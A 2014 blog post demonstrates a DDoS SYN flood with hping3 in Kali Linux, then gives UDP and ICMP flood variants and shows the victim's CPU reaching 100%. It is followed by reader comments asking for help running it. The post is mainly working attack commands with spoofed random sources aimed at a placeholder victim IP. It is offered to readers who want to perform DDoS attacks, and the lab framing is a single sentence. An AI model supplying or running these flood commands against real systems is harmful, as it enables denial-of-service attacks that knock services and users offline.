Selasa, 01 April 2014

DDoS attack using hping Command in Kali Linux

First of all, what is hping command in linux ? Hping is a command-line oriented TCP/IP packet assembler/analyzer. There are many uses of hping in the world of IT security.

Usage of Hping :
  • Firewall Testing
  • Advanced Port Scanning
  • Network testing using different protocol
  • Manual Path MTU discovery
  • Advanced trace route
  • Remote OS fingerprinting
  • Remote uptime guessing
  • TCP/IP stack auditing

In this case, i will show the hping usage in performing DDoS attack. Please note that in this example I will use hping3 and all the command is executed in VM attacking another VM. The main command to use hping as DDoS is :

hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source (Victim IP)

-V : Verbose Mode is an option to provides additional details as to what the computer is doing and     what drivers and software it is loading

-c : packet count (in this case the packet count is 1000000)

-d : data size, in this case the data size is 120

-S : set SYN flag

-w : windows size, in this case the windows size is 64

-p : port, in this case the destination port is 445

-s : base source port, in this case the source port displayed will be port 445

--flood : flood mode, send packets as fast as possible and will not show replies

--rand-source : random the source address mode (Spoofing)

Preview :

This is hping DDoS attack in action. In this screen shot you can see i made many mistake in typing the first 5 command but this is learning process so mistake will only make you better.

As you can see, the target OS(Windows XP SP3) process reach 100% and it will give the victim very heavy work load (slow PC, lagging).

This is the WireShark preview in the target OS :

As you can see in the wireshark log, there are massive connection to (victim IP) from many source targeting the port 445 of the target. In this case, the source is randomised by the hping (using --rand-source) command. The default protocol while using hping DDoS is NBNS protocol.

However, hping can use another protocol of attacking such as:

UDP : hping3 --flood --rand-source --udp -p 445 (Victim IP)    <-- Stated by --udp command

ICMP : hping3 --flood --rand-source --icmp -p 445 (Victim IP)   <-- Stated by --icmp command

Thats all for this week. Hope this will help all of you out there who want to learn how to use hping to perform DDoS attack.

5 komentar:

  1. i still dont get it. any chance i could get help thru skype?

  2. i tried every method on my own pc i even tried them all at once but nothing so could i get guided thru skype?

  3. Can i send a specific UDP packet (not random data)

  4. Thanks for this helpful information I agree with all points you have given to us.Please visit once at